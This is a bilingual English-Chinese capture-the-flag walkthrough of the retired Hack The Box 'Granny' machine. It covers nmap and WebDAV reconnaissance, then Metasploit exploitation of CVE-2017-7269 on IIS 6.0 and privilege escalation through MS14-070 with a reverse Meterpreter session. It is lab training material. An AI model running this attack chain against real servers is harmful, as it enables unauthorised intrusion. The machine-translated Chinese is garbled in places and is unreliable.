推箱子2-向右推!_保持冷静，砍箱子-奶奶

推箱子2-向右推!

Hack The Box (HTB) is an online platform that allows you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。 它包含一些不断更新的挑战。 他们中的一些人正在模拟现实世界的场景，而另一些人则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.

注意 。 只允许注销HTB机器。

Granny, similarly to Grandpa, can be exploited using several different methods like the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.

与爷爷类似，可以使用多种方法来利用Granny，例如广泛使用的CVE-2017-7269。 利用此漏洞很简单，当它成为公共知识时，便可以立即访问全球数以千计的IIS服务器。

We will use the following tools to pawn the box on a Kali Linux box:

我们将使用以下工具在Kali Linux盒子上放置盒子 ：

• nmap
  纳帕
• Searchsploit
  Searchsploit
• davtest
  davtest
• Metasploit
  Metasploit
• Local exploit suggester
  本地漏洞利用建议

Let's get started.

让我们开始吧。

I add granny on the /etc/hosts file

我在/ etc / hosts文件上添加了奶奶

nano /etc/hosts

with

与

10.10.10.15     granny.htb

第1步-侦察 (Step 1 - Reconnaissance)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。 在此阶段花更多的时间来获取尽可能多的信息总是更好的选择。

端口扫描 (Port scanning)

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap(网络映射器)。 Nmap是一个免费的开源实用程序，用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用许多命令来扫描网络。 如果您想了解更多信息，可以在这里查看文档。

I use the following command to perform an intensive scan:

我使用以下命令执行密集扫描：

nmap -A -v granny.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increase verbosity level

-v：提高详细程度

granny.htb: hostname for the Granny box

granny.htb： “奶奶”框的主机名

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

如果发现结果有点不堪重负，则可以执行另一个命令以仅获取打开的端口。

nmap granny.htb

We can see that there is only 1 open port:

我们可以看到只有1个开放端口：

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

端口 80 ，超文本传输​​协议(HTTP)最常使用的端口

We know that the server is an IIS 6.0 from the http-server-header. Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server software created by Microsoft for use with the Windows NT family. More info here.

我们从http-server-header知道服务器是IIS 6.0。 Internet信息服务 ( IIS ，以前称为Internet Information Server )是Microsoft创建的可扩展的Web服务器软件，用于Windows NT家族。 更多信息在这里 。

IIS 6.0 (code name "Duct Tape"), included with Windows Server 2003 and Windows XP Professional x64 Edition, added support for IPv6 and included a new worker process model that increased security as well as reliability HTTP.sys was introduced in IIS 6.0 as an HTTP-specific protocol listener for HTTP requests

Windows Server 2003和Windows XP Professional x64 Edition附带的IIS 6.0(代号为“胶带”)增加了对IPv6的支持，并包括一个新的工作进程模型，该模型提高了安全性和可靠性，IIS 6.0中引入了HTTP.sys。 HTTP请求的HTTP特定协议侦听器

We can also see from the http-title that the website is "under construction" and that there is a http-webdav-scan with all the allowed methods.

我们还可以从http-title中看到该网站正在“建设中”，并且存在一个包含所有允许方法的http-webdav-scan 。

I use another nmap script to try to get more information. The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal IP addresses by doing pattern matching in the response body

我使用另一个nmap脚本来尝试获取更多信息。 该脚本发送一个OPTIONS请求，其中列出了dav类型，服务器类型，日期和允许的方法。 然后，它发送PROPFIND请求，并尝试通过在响应主体中进行模式匹配来获取公开的目录和内部IP地址

nmap --script http-webdav-scan -p80 granny.htb

Here is more info on this script from the nmap website.

以下是nmap网站上有关此脚本的更多信息 。

WebDAV or Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. More info here.

WebDAV或Web分布式创作和版本控制 ( WebDAV )是超文本传输​​协议的扩展，该协议允许客户端执行远程Web内容创作操作。 更多信息在这里 。

We can see on the server support section that Microsoft's IIS has a WebDAV module.

我们可以在服务器支持部分看到Microsoft的IIS具有WebDAV模块。

I use davtest to check if I can upload files.

我使用davtest检查是否可以上传文件。

I use the following command:

我使用以下命令：

davtest -url granny.htb

It doesn't look like I can upload files. I use Searchsploit to check if there is any known vulnerability on IIS 6.0. Searchsploit is a command line search tool for Exploit Database.

我无法上传文件。 我使用Searchsploit来检查IIS 6.0上是否存在任何已知漏洞。 Searchsploit是Exploit Database的命令行搜索工具。

I use the following command:

我使用以下命令：

searchsploit iis 6.0

I can get more details on the exploit with:

我可以通过以下方式获得有关漏洞利用的更多详细信息：

searchsploit -x 41738.py

The attack is based on a Return-oriented programming chain. Return-oriented programming (ROP) is a security exploit technique that allows an attacker to execute code in the presence of security defense such as executable space protection and code signing.

攻击基于面向返回的编程链。 面向返回的编程 ( ROP )是一种安全利用技术，允许攻击者在存在安全防御(例如可执行空间保护和代码签名)的情况下执行代码。

You can also check the Exploit Database to find the exploit.

您还可以检查漏洞利用数据库以查找漏洞利用。

The National Vulnerability Database,

国家漏洞数据库

and the Common Vulnerabilities and Exposure database are also worth checking.

常见漏洞和披露数据库也值得检查。

There is one Metasploit module available.

有一个可用的Metasploit模块。

第2步-访问网站 (Step 2 - Visiting the website)

We don't see much when visiting the website. From the developer console, we can see it's powered by the ASP.NET framework

访问该网站时看不到太多内容。 从开发人员控制台，我们可以看到它由ASP.NET框架提供支持

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders

我们将使用Metasploit ，它是一种渗透测试框架，可使黑客攻击变得简单。 对于许多攻击者和防御者来说，这是必不可少的工具

I launch the Metasploit Framework on Kali and look for the command I should use to launch the exploit.

我在Kali上启动Metasploit框架 ，并寻找用于启动漏洞利用程序的命令。

If I use this command

如果我使用此命令

searchsploit iis 6.0

I get the same table that I had from the Terminal earlier.

我可以从终端上获得相同的表格。

If I type

如果我输入

search iis 6.0

I get 174 results.

我得到174个结果。

The exploit I'm interested in is number 147 on this list.

我感兴趣的漏洞利用程序在此列表中排名第147。

If you want to get more information about the exploit, you can use the following command:

如果要获取有关漏洞利用的更多信息，可以使用以下命令：

info exploit/windows/iis/iis_webdav_scstoragepathfromurl

I use the following command to use the exploit:

我使用以下命令来使用漏洞利用程序：

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

I need to set up the options before launching the exploit. I check the options with

我需要在启动漏洞利用程序之前设置选项。 我检查选项

show options

I set the RHOSTS with the following command:

我使用以下命令设置RHOSTS ：

set RHOSTS granny.htb

When I check again the options, I get this:

当我再次检查选项时，得到以下信息：

I check if the target is vulnerable with

我检查目标是否易受攻击

check

Then I run the exploit with the command

然后我用命令运行漏洞

exploit

And I get a Meterpreter session.

我得到了一个Meterpreter会议。

Here's the definition of Meterpreter from Offensive Security:

这是来自Offensive Security的Meterpreter的定义：

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter是一种高级的，动态可扩展的有效负载，它使用内存中的 DLL注入暂存器，并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信，并提供全面的客户端Ruby API。 它具有命令历史记录，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此处阅读有关Meterpreter的更多信息。

Let's start by gathering some information.

让我们开始收集一些信息。

getuid returns the real user ID of the calling process. The session I got doesn't seem to have enough privileges to run this command. Access is denied:

getuid返回调用过程的真实用户ID。 我获得的会话似乎没有足够的特权来运行此命令。 访问被拒绝：

When this happens, I list the running processes with

发生这种情况时，我列出了正在运行的进程

ps

and pick one running NT AUTHORITY\NETWORK SERVICE

并选择一个正在运行的NT AUTHORITY \ NETWORK SERVICE

I migrate to the process 792 with

我将迁移到流程792

migrate 792

Now when I check getuid, I get

现在，当我检查getuid时，我得到

Server username: NT AUTHORITY\NETWORK SERVICE

This is the session I got after migrating to another process

这是我迁移到另一个进程后获得的会话

I type the following command to get a standard shell on the target system

我键入以下命令以在目标系统上获取标准外壳

shell

I check who I am on the machine with the command

我使用以下命令检查我在机器上的身份

whoami

I get more information from the machine with

我从机器上获得了更多信息

systeminfo

I navigate to C:\

我导航到C：\

then Documents and Settings with

然后文档和与设置

cd "Documents and Settings"

I can see two users – Administrator and Lakis. I try to navigate to Lakis. Access is denied. Same for the administrator folder – which is expected as I don't have root access yet.

我可以看到两个用户- 管理员和拉基斯 。 我尝试导航到Lakis。 访问被拒绝。 管理员文件夹也一样–这是预期的，因为我还没有root访问权限。

I exit the shell with the command

我用命令退出外壳

exit

第3步-使用本地漏洞利用建议程序 (Step 3 - Using local exploit suggester)

I run the local exploit suggester. The exploits are suggested based on the architecture and the platform the user has the shell open in, along with the available exploits in meterpreter.

我运行本地漏洞利用建议程序 。 根据用户打开外壳的体系结构和平台以及Meterpreter中的可用漏洞，建议利用漏洞。

run post/multi/recon/local_exploit_suggester

I will use the MS14-070 exploit. I look for some more information on Metasploit with

我将使用MS14-070漏洞利用。 我正在寻找有关Metasploit的更多信息

info exploit/windows/local/ms14_070_tcpip_ioctl

As well as on the Rapid7 website

以及Rapid7网站上

步骤4-使用MS14-070执行特权升级 (Step 4 - Using MS14-070 to perform privilege escalation)

I put this session in the background with the command

我使用以下命令将此会话置于后台

background

I run the following command to use the exploit I found

我运行以下命令以使用发现的漏洞

use exploit/windows/local/ms14_070_tcpip_ioctl

I then check for the options of this exploit

然后，我检查此漏洞利用的选项

I set the session with

我设置了会话

set SESSION 1

I run the exploit with

我与运行漏洞

run

The exploit succeeded, but I didn't get a shell back. I check the options

该漏洞利用成功了，但是我没有得到外壳。 我检查选项

and set the LHOST to my IP with

并将LHOST设置为我的IP

set LHOST 10.10.14.36

You can check yours here.

您可以在这里检查您的。

I then run the exploit with

然后，我使用

exploit

This confirms that the exploit has succeeded, but I still don't get a shell. I check the session with

这确认漏洞利用成功，但是我仍然没有外壳。 我检查会话

sessions -l

I should have

我应该

NT AUTHORITY\SYSTEM

Which is not the case now, so I go back to this session with

现在不是这种情况了，所以我回到

sessions -i 1

I check getuid and get NT AUTHORITY\SYSTEM back. I get a standard shell on the target system and check who am I on the machine. I get NT AUTHORITY\NETWORK SERVICE back, which is not what I want!

我检查getuid并获得NT AUTHORITY \ SYSTEM 。 我在目标系统上获得了标准外壳，并检查我在计算机上是谁。 我回来了NT AUTHORITY \ NETWORK SERVICE ，这不是我想要的！

I exit this shell and check the processes. I can see that I have admin access on the machine. I just meed to migrate to another process, which I do with

我退出此外壳并检查进程。 我可以看到我在计算机上具有管理员访问权限。 我只是想迁移到另一个过程中

migrate 408

I'm back to the standard shell on the target system. And when I check who I am on the machine, I'm finally an admin!

我回到目标系统上的标准外壳程序。 当我检查我在机器上的身份时，我终于是管理员！

步骤5-寻找user.txt标志 (Step 5 - Looking for the user.txt flag)

I navigate to the Lakis folder from Documents and Settings.

我从“ 文档和设置”导航到Lakis文件夹。

I can list all the files/folders with the following command

我可以使用以下命令列出所有文件/文件夹

dir

I then move to the Desktop

然后，我转到桌面

And I find the user flag! I can check the contents of the file with

而且我找到了用户标志！ 我可以检查文件的内容

type user.txt

第6步-寻找root.txt标志 (Step 6 - Looking for the root.txt flag)

Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

让我们现在找到根标志！ 我向上导航至“ 用户”并签入“ 管理员 / 桌面”文件夹。 我找到了旗帜！

I use the following command to see the content of the file

我使用以下命令查看文件内容

type root.txt

Congrats! You found both flags!

恭喜！ 您找到了两个标志！

Please don’t hesitate to comment, ask questions or share with your friends :)

请不要犹豫，发表评论，提问或与您的朋友分享:)

You can see more of my articles here.

您可以在这里看到更多我的文章。

You can follow me on Twitter or on LinkedIn.

您可以在Twitter或LinkedIn上关注我。

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘记＃ GetSecure ，＃ BeSecure和＃StaySecure ！

---

---

Other Hack The Box articles

其他Hack The Box文章

• Keep Calm and Hack The Box - Lame

  保持冷静并砍箱子-me脚

• Keep Calm and Hack The Box - Legacy

  保持冷静并打破常规-旧版

• Keep Calm and Hack The Box - Devel

  保持冷静并打破僵局-开发

• Keep Calm and Hack The Box - Beep

  保持冷静并砍箱子-哔

• Keep Calm and Hack The Box - Optimum

  保持冷静并打破僵局-最佳

• Keep Calm and Hack The Box - Arctic

  保持冷静，砍箱子-北极

• Keep Calm and Hack The Box - Grandpa

  保持冷静，砍箱子-爷爷

翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-granny/

推箱子2-向右推!